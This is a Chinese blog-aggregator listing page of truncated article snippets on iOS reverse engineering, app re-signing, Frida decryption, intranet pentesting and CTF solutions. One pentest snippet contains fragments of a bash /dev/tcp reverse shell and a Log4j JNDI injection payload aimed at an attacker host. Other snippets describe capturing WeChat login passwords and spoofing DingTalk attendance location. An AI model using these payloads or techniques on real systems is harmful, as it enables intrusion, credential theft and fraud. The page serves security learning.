iOS逆向安全攻防第14页

#Android系统安全书籍

Android系统安全ANDROID安全架构深究Android安全攻防权威指南Android安全攻防实战(南非)keithmakan,崔孝晨;武晓音(译)Android安全技术揭秘与防范Android软件安全与逆向分析

Fitz_Lee·2022-02-16 11:36

iOS逆向⼯工程常规套路

▸观察、猜测，寻找分析切⼊入点;▸⽤用dumpdecrypted给App砸壳;▸⽤用class-dump导出Objective-C头⽂文件;▸⽤用Cycript定位⺫⽬目标视图;▸获取⺫⽬目标视图的UIViewController或delegate;▸在controller的头⽂文件中寻找蛛丝⻢马迹;▸⽤用Hopper和LLDB的组合还原调⽤用逻辑;▸⽤用Theos编写插件。

saman0·2022-02-15 12:11

iOS逆向实战--013：应用签名原理

代码签名代码签名是对可执行文件或脚本进行数字签名，用来确认软件在签名后未被修改或损坏的措施。和数字签名原理一样，只不过签名的数据是代码而已简单的代码签名在iOS出来之前，以前的主流操作系统（Mac/Windows）软件随便从哪里下载都能运行，系统安全存在隐患，盗版软件、病毒入侵、静默安装等等。那么苹果希望解决这样的问题，要保证每一个安装到iOS上的App都是经过苹果官方允许的，怎样保证呢？就是通过

帅驼驼·2022-02-14 18:36

Android 混淆总结

混淆关于混淆的概念请移步郭霖大神博客：Android安全攻防战，反编译与混淆技术完全解析（下）。小白必看，全面易懂。使用这里就直接说怎么使用了。

_戏_梦·2022-02-14 15:12

iOS逆向-Frida脱壳

背景之前用过越狱iPhone6iOS12.4.1系统进行clutch进行脱壳时是成功的，但是后来发现同样的app在iOS12.4.8系统无论是进行clutch还是dumpdecrypted进行脱壳时都不能成功，而且现在有的app里面都进行了防clutch，所以这两种方式用起来都是很不方便的，进行给大家介绍一种Frida脱壳。准备准备一台越狱手机，笔者的是iPhone6，12.4.8系统。iPhon

含笑州·2022-02-14 13:42

iOS逆向工程（九）：ASLR

ASLR前言以前我们用Xcode的LLDB指令打断点时，可以用方法名打断点，例如breakpointset-n"[UIViewControllertouchBegin:]"，但是我们想动态调试别人的App，就不能用方法名称了，需要用到方法的内存地址才能打，例如breakpointset--address0x123123123而想知道方法的内存地址就需要学习ASLR一、什么是ASLR？ASLR，全称

冰风v落叶·2022-02-14 03:45

iOS逆向安全之代码重签名技术

在了解代码重签名之前,可能我们需要先了解什么是代码签名.一什么是代码签名:代码签名是指的对可执行文件进行数字签名,以防止软件在网上发布流传过程中被篡改或者缺损,它实质上跟数字签名一样,只不过不同的是代码签名签名的是代码而已.二苹果双层代码签名原理:场景:我们回顾下,在iOS系统出现之前,windowsmacOS等系统盗版软件猖獗,病毒肆虐,各种软件通过后门未经要不过户许可就静默加载进我们的设备中.

SharaYuki·2022-02-14 03:40

iOS逆向 04：OC反汇编（上）

iOS底层原理+逆向文章汇总本文主要讲解编译器的优化以及指针的汇编编译器优化设置可在项目的BuildSetting->OptimizationLevel中找到，一般的优化方案选择FS（Fastest，Smallest）优化设置案例分析有以下代码intmain(intargc,char*argv[]){inta=1;intb=2;}在没有优化情况下的汇编如下未优化汇编将优化方案从None改成FS，汇

Style_月月·2022-02-13 22:53

iOS逆向 11：代码注入（下）

iOS底层原理+逆向文章汇总本文主要是以WeChat为例，讲解如何破坏WeChat注册、以及如何获取登录密码引子在进行WeChat实践操作时，首先需要了解一个概念：MethodSwizzing（即方法交换）MethodSwizzing（即方法交换）是利用OC的Runtime特性，动态改变SEL（方法编号）和IMP（方法实现）的对应关系，达到OC方法调用流程改变的目的，主要用于OC方法。在OC中，S

Style_月月·2022-02-13 11:43

iOS逆向1023-反调试&&反反调试

概括：Xcode、LLDB001--debugserver002--debugserver下003--命令行工具004--反调试Ptrace005--反Ptrace006--通过framework防护调试007--总结001--debugserver上查看debugserverimage.pngimage.png手机IPimage.png越狱环境下：先连接手机，再通过debugserver调试#.

lukyy·2022-02-13 09:02

iOS逆向学习笔记8（MachO文件）

1什么是MachO文件 Mach-O其实就是MachObject文件格式的缩写，是Mac以及iOS上可执行文件的格式，类似于Windows上的PE格式（PortableExectable）、linux上的elf格式（executableandLinkingFormat）。 MachO是一种可执行文件、目标代码以及动态库等类型文件的格式。作为a.out格式的替代，Mach-O提供了更强的扩展性。

_从今以后_·2022-02-13 09:58

iOS逆向：签名机制

目录一，加密解密二，单向散列函数三，数字签名四，证书五，签名机制六，重签名（一）七，重签名（二）一，加密解密1，为何加密：防止消息被窃听加密前加密后2，如何加密对称密码：加密密钥和解密密钥相同公钥密码（非对称密码）：加密密钥和解密密钥不同3，对称密码DES（DataEncryptionStandard）1>是一种将64bit明文加密成64bit密文的对称密码算法2>严格来说，密钥长度是64bit，

码小菜·2022-02-13 01:09

iOS逆向工程（六）：使用frida-ios-dump工具，一键脱壳

使用frida-ios-dump工具，一键脱壳一、加壳我们知道App上传到AppStore后，会被自动加壳，那么什么是加壳呢？加壳就是利用特殊的算法，对可执行文件的编码进行改变（例如：压缩、加密），已达到保护程序代码的目的。加壳之前，执行程序，就会直接把可执行文件载入到内存中，如下图所示：加壳之前的执行过程.png加壳之后，执行程序，会把包裹着加密可执行文件的壳程序载入内存，在内存中，由壳程序对可

冰风v落叶·2022-02-12 11:46

01-iOS逆向学习必要条件

设备要求一台完美越狱的iOS设备。iPhone：建议是iPhone5s以上（支持arm64架构）iPad：建议是iPadAir、iPadmini2等（支持arm64架构）。系统要求iOS8以上判断系统是否能完美越狱建议使用PP助手官网：http://jailbreak.25pp.com/ios什么是iOS越狱越狱，英文Jailbreak，指利用iOS系统的漏洞，获取iOS系统的Root权限，解开之

hejunbinlan·2022-02-12 06:46

iOS逆向之脱壳

一、加壳和脱壳1、加壳利用特殊的算法，对可执行文件的编码进行改变（比如压缩、加密），以达到保护程序代码的目的。iOS端App在上线之前会有苹果商店进行FairPlayDRM数字版权加密保护，我们称之为“加壳”。图1：加壳.png2、脱壳要对AppStore分发的iOSApp进行分析，我们需要先对App进行解密，我们称之为“脱壳”，有些人也称为“砸壳”。脱壳之后的二进制文件就是原始的、未加密的二进制

张聪2021·2022-02-12 02:27

Union注入实验笔记

本文采用的是《Web安全攻防渗透测试实战指南》提供的代码及数据库.1环境介绍union.php";}?

coderge·2022-02-11 18:53

谈谈iOS逆向

从业iOS后，也算兢兢业业，平时关注一些OC，swift动态，看别人造的完美轮子来学习，而自己造的轮子和自己做的饭有相同功效，只有自己能吃的下去。然而这并不是重点，重点是自己一直忽略的ios黑产，其实依然一片繁荣。最近会帮朋友搞一些ios破壳和逆向、外挂的功能，也算是涨了见识。下面列举一些常见的黑产需求：修改别人游戏包，自己获利。破壳，用途太广。可用来研究逻辑，也修改发布等等。外挂。微信抢红包，钉

pipa·2022-02-11 13:10

iOS逆向与安全9.1：越狱调试

RevealReveal是一款UI调试神器，对iOS开发非常有帮助。尤其是越狱调试，能让越狱开发如虎添翼。安装Revealmac电脑安装下载安装包安装手机安装安装revealLoader插件有设置项，在revealLoader中查看就好环境配置导入dylib文件由于新版本的Reveal只有Framework文件，所以需要修改Framework的可执行文件为dylib库找到相关库image.png在

looha·2022-02-10 18:34

iOS逆向开发(五)----iOS签名机制

iOS逆向开发(五)----iOS签名机制根据密钥的使用方法，可以将密码分为2种:对称密码公钥密码（非对称密码）对称密码在对称密码中，加密、解密时使用的是同一个密钥,常见的对称密码算法有:DES,3DES

会笑的Even·2022-02-08 16:36

iOS逆向-手机和电脑进行连接

为了能够让Mac终端中的命令行能作用在iPhone上，我们得让Mac和iPhone建立连接。1、iPhone上安装OpenSSH工具（软件源http://apt.saurik.com）SSH：SecureShell的缩写，意为“安全外壳协议”，是一种可以为远程登录提供安全保障的协议使用SSH，可以把所有传输的数据进行加密，“中间人”攻击方式就不可能实现，能防止DNS欺骗和IP欺骗OpenSSH是S

Missmiss懵·2022-02-08 13:18

[内网安全]四.内网信息收集--BloodHound工具与PowerShell工具的使用

这系列文章入门部分将参考徐焱老师的《内网安全攻防》这本书，并结合作者在安全牛课堂分享的学习讲解视频，且看且珍惜吧！

PsgQ·2022-02-08 10:52

[内网安全]三.内网信息收集--工作组信息收集与域内信息收集

这系列文章入门部分将参考徐焱老师的《内网安全攻防》这本书，并结合作者在安全牛课堂分享的学习讲解视频，且看且珍惜吧！

PsgQ·2022-02-08 10:22

安全攻防-kali内网渗透实战

外网打点首先对web进行端口扫描，发现38080端口和22端口访问一下38080端口发现是一个errorpage用Wappalyzer看一下是什么架构，但是好像没有检测出来【一>所有资源获取&/dev/tcp/192.168.1.105/99990>&1抓包添加payload=${jndi:ldap:1/192.168.199.140:1389/TomcatBypass/Command/Base6

kali_Ma·2022-02-08 10:41

iOS逆向-汇编(六)

栈栈：是一种具有特殊的访问方式的存储空间（后进先出，LastInOutFirt，LIFO）8086会将CS作为代码段的段地址，将CS:IP指向的指令作为下一条需要取出执行的指令8086会将DS作为数据段的段地址，movax,[address]就是取出DS:address的内存数据放到ax寄存器中8086会将SS作为栈段的段地址，任意时刻，SS:SP指向栈顶元素8086提供了PUSH（入栈）和POP

Stone_熊小叔·2022-02-06 18:17

iOS逆向实战--012：对称加密

对称加密方式：明文通过密钥加密得到密文，密文通过密钥解密得到明文。定义需要对加密和解密使用相同密钥的加密算法。由于其速度快，对称性加密通常在消息发送方需要加密大量数据时使用对称性加密也称为密钥加密。所谓对称，就是采用这种加密方法的双方使用方式用同样的密钥进行加密和解密。密钥是控制加密及解密过程的指令。算法是一组规则，规定如何进行加密和解密因此加密的安全性不仅取决于加密算法本身，密钥管理的安全性更是

帅驼驼·2022-02-06 17:05

iOS逆向，钉钉在家就可以打卡的秘诀！

前言疫情期间在家上班,打卡是个麻烦事,笔者就想起实现这个需求,本文由于讲述从思路到完整分析过程演示,涉及到的知识点也基本都有介绍,因此篇幅较长,对相关知识比较熟悉的同学可以自行跳过.本篇文章将演示从思路->探索->调试->注入,来实际逆向一个应用的完整过程.实现的效果是修改Wi-Fi打卡以及GPS位置打卡规则,达到不在要求Wi-Fi环境或者GPS范围下也可以正常打卡的需求.(本文使用目前钉钉最新版

马士兵教育苹果老师·2022-02-06 15:15

iOS逆向1025-安全终章

001--代码混淆代码混淆的作用：防止别人通过类名、方法名猜出其功能。一般去混淆关键的信息功能！不能全工程代码混淆，效率会严重降低！创建PrefixHeader_pch文件，用宏代替：方法名、类名//------------------------PrefixHeader_pch----------------//PrefixHeader.pch//001--UserInfoDemo#ifndef

lukyy·2022-02-06 15:48

iOS逆向攻防之了解MachO文件

“凡心所向，素履所往，生如逆旅，一苇以航。”-《尘曲》图片发自App直入正题，今天我们来了解一下逆向Hook一个App非常重要的文件，就是MachO文件。通过查看应用打包后的ipa包内容，我们发现，用户的代码部分就是在MachO文件里面，那么MachO到底是什么呢？我们来一起了解一下今天MachO文件相关的知识内容，这也是逆向分析非常关键的一环：1、MachO文件简介2、可执行文件3、通用二进制文

溪浣双鲤·2022-02-06 01:04

iOS逆向攻防之应用签名、证书、描述文件以及手动/自动重签名

接着上篇数字签名的内容，数字签名就是对原始报文数据的Hash值进行一次非对称的加密，数字签名主要使用来校验数据的；那么代码签名，顾名思义就是用来校验代码的代码签名是对可执行文件或者脚本进行数字签名，是用来确认软件在签名后未损坏或者被修改的措施。和数字签名原理一样，只不过签名的数据是代码而已。那么接下来我们一点点的来分析：1、苹果双向验证签名原理2、描述文件的产生3、使用codesign进行应用重签

溪浣双鲤·2022-02-06 00:11

iOS逆向-越狱(Ⅹ)

越狱(jailBreak)通过iOS系统安全启动链漏洞，从而禁止掉信任链中负责验证的组件。拿到iOS系统最大权限ROOT权限.iOS系统安全启动链当启动一台iOS设备时，系统首先会从只读的ROM中读取初始化指令，也就是系统的引导程序(事实上所有的操作系统启动时都要经过这一步，只是过程略有不同)。这个引导ROM包含苹果官方权威认证的公钥，他会验证底层启动加载器(LLB)的签名，一旦通过验证后就启动系

鼬殿·2022-02-05 23:28

iOS逆向之移除Oplayer lite广告

iOS逆向之移除Oplayerlite广告一、环境要求：1、iPodtouch6:iOS10.3.1(已经越狱)2、Xcode安装MonkeyDev3、OPlayerLite.ipa(WindowPP助手获取

Evans_Xiao·2022-02-05 22:15

iOS逆向之签名原理

前言本篇文章虽然是介绍iOS开发中ipa包的签名原理。但因为签名涉及到密码学中的概念。在了解签名之前，我们需要明确一些概念。密码学中，根据加解密密钥的不同，通常把加密方式分为对称密码（对称加密）和公钥密码（非对称加密）。常见加密算法有：DES、3DES、DESX、AES、RSA、ECC。其中RSA、ECC是非对称加密算法。以下是一些必要的概念。对称密码：又叫做对称加密。加密和解密使用的是同一个密钥

VV木公子·2022-02-05 10:53

iOS逆向(1)--初识汇编

001--初识汇编我们在学习逆向开发之前,我们要了解一个基本的逆向原理.首先我们是逆向iOS系统上面的APP.那么我们知道,一个APP安装在手机上面的可执行文件本质上是二进制文件.因为iPhone手机本质上执行的指令是二进制.是由手机上的CPU执行的.所以逆向开发是建立在分析二进制上面.所以今天我们接下来的课程从非常基础的东西开始讲解.汇编语言的发展机器语言由0和1组成的机器指令.加：010000

空壳子XJ·2022-02-05 08:33

iOS逆向砸壳之dumpdecrypted

1.把app用iTools倒到电脑桌面，生成api的包，用归档实用工具打开2.然后打开显示包内容，找到可执行文件，用Go2shell打开，在终端输入otool-lWeChat|grepcrypt，查看文件加密还是不加密，cryptid1为加密，cryptid0为不加密3.在终端输入:lipo-infoWeChat,结果Architecturesinthefatfile:WeChatare:armv

xhzth70911·2022-02-04 22:04

iOS逆向一：数字签名&苹果应用双重签名原理&应用重签名

hashhash(哈希)算法是指将任意长度的文本，通过一个算法后得到一个固定长度的文本(也可能是二进制数据)，哈希其实是一种思想，所有符合这种思想的算法都可以称之为哈希算法(不如MD5,sha1,sha256)哈希算法具有以下特点：1.相同的源文本，通过算法得到的结果必然相同2.不同的原文本，通过算法得到的结果必然不同（也有散列碰撞的情况不过概率很小）3.无法从结果反推出源文本hash的应用：1.

superFool·2022-02-03 10:02

iOS逆向实战_微信

一.说明我的手机是越狱的iPhoneX12.1系统.mac是10.14.5系统.二.找微信mac终端运行sh_sshWithUSB.sh,root权限登录到手机iphone运行ps-A,找到微信的位置486??0:06.72/var/containers/Bundle/Application/5C8E31C1-E9EF-4E15-902D-6AFA25B99E7D/WeChat.app/WeCha

globalYK·2022-02-03 08:31

iOS逆向app之MonkeyDev

GitHub地址https://github.com/AloneMonkey/MonkeyDev中文文档https://github.com/AloneMonkey/MonkeyDev/wiki/%E5%AE%89%E8%A3%851.安装最新的theossudogitclone--recursivehttps://github.com/theos/theos.git/opt/theos2.安装l

SylarCao·2022-02-02 23:30

iOS逆向06 -- Mach-O

Mach-O文件Mach-O是MachObject文件格式的缩写，是mac以及iOS上可执行文件的格式，例如当XcodeApp工程编译完成之后就会生成一个可执行文件，其格式就是Mach-O文件；Mach-O的相关名词Executable可执行文件；Dylib动态库；Bundle无法被连接的动态库，只能通过dlopen()加载；Image指的是Executable，Dylib或者Bundle的一种，

YanZi_33·2022-01-06 13:20

iOS逆向之断点技巧

如何断在没有源码的第三方库里,这里涉及到lldb命令:brs-a+函数地址如何获得函数地址:1.可以通过IDA查找2.可以通过打断点到他的下级调用函数在函数栈切换成汇编模式才能看到函数起始地址@1.xcode-->Debug-->DebugWorkflow->AlwaysShowDisassembly查看汇编@2.已知0x100f0a2b0为函数的起始地址@3.通过函数地址-ASLR=函数mach

·2021-12-01 17:02

iOS逆向技巧之HOOK

目前的几种hook方式:1.通过oc的runtime方式去hook，这个仅限于oc方法的hook,有局限性.2.通过monkeydev的logs方式进行hook，这个是monkeydev在oc的runtime方式封装成工具形式,也仅限于oc方法的hook.3.通过monkeydev的substrate可以hook地址，地址查找可通过IDA查看,优点:1.应用范围比较广,可以hookc、c++、sw

·2021-12-01 16:23

【Microsoft Azure 的1024种玩法】五、基于Azure Cloud Shell 一站式创建Linux VM

【前期文章】【MicrosoftAzure的1024种玩法】一.一分钟快速上手搭建宝塔管理面板【MicrosoftAzure的1024种玩法】二.基于Azure云平台的安全攻防靶场系统构建

一直特立独行的兔先生·2021-11-22 13:00

iOS逆向开发：密码学 HASH

前言最近看了一篇关于逆向实战的文章：来谈谈iOS逆向工程之App脱壳，比起理论还是实战更有趣，觉得还不错分享给大家看看，参考参考。好话不多说，开始本篇文章的主题吧。

秃头少女_·2021-11-17 15:36

用python写一个自动化盲注脚本

参考资料：《python安全攻防》和盲注相关的payload写

雪痕*·2021-11-03 19:00

【渗透测试自学系列】——Web安全攻防技术演化

目录1.1.1.简单网站1.1.1.1.静态页面1.1.1.2.多媒体阶段1.1.1.3.CGI阶段1.1.1.4.Ajax1.1.1.5.MVC1.1.2.数据交互1.1.2.1.简单数据交互1.1.2.2.RESTful1.1.2.3.GraphQL1.1.2.4.二进制1.1.3.中间件1.1.3.1.架构复杂化1.1.3.2.分布式1.1.3.3.CI/CD1.1.4.云服务1.1.4.1

LexSaints·2021-10-31 12:06

当爬虫工程师遇到 CTF丨B 站 1024 安全攻防题解

答案参考第一题：a1cd5f84-27966146-3776f301-64031bb9第二题：36c7a7b4-cda04af0-8db0368d-b5166480第三题：9d3c3014-6c6267e7-086aaee5-1f18452a第四题：3d5dd579-0678ef93-18b70cae-cabc5d51第五题：516834cc-50e448af-bcf9ed53-9ae4328e第

·2021-10-26 16:21

当爬虫工程师遇到 CTF丨2021 年 B 站 1024 安全攻防题解

文章目录答案参考第一题：加密解密第二题：前端配置项第三题：最好的语言第四题：SQL注入第五题：APP逆向第六题：IDA逆向SO第七题：风控恶意IP总结答案参考第一题：a1cd5f84-27966146-3776f301-64031bb9第二题：36c7a7b4-cda04af0-8db0368d-b5166480第三题：9d3c3014-6c6267e7-086aaee5-1f18452a第四题：

K哥爬虫·2021-10-23 18:50

iOS逆向之深入解析Theos开发插件如何使用

一、Logos语法Logos作为Theos开发组件的一部分，通过一组特殊的预处理指令，可以让编写函数钩子（hook）代码变得非常简单和清晰，Logos是随着Theos发布的。%hook指定需要hook的类名，以%end结尾。%log用来打印log，将信息输入到syslog中，如%log((NSString*)@“ZeluLi”)。%orig执行被hook函数的原始代码，类似于super.metho

Forever_wj·2021-10-23 03:30

iOS逆向之hook框架frida的安装和使用

一、Frida利用Hopper、class-dump、ios-ssl-kill-switch、Keychain-Dumper、MachOParser可以进行静态分析。使用CycriptTricks（Powerfulprivatemethods）、UIButton的sendActionsForControlEvents、DerekSelanderLLDB(Pythonscriptstoaidinyo

Forever_wj·2021-10-23 02:56

php安全攻防利用文件上传漏洞与绕过技巧详解

·2021-10-14 18:20

php安全攻防世界unserialize函数反序列化示例详解

目录步骤总结步骤首先打开题目，发现给了一段源码：分析源码，发现类里面有三个魔术方法：__construct()：构造函数，对类的变量进行初始化，创建时自动调用，用得到的参数覆盖$file__destruct()：销毁时调用，会显示文件的代码，这里要显示fl4g.php__wakeup()：在进行反序列化之前会调用，会把$file重置成index.php正则表达式的含义：o或c开头，冒号，一个或多个

·2021-10-14 16:42

推荐频道

iOS逆向安全攻防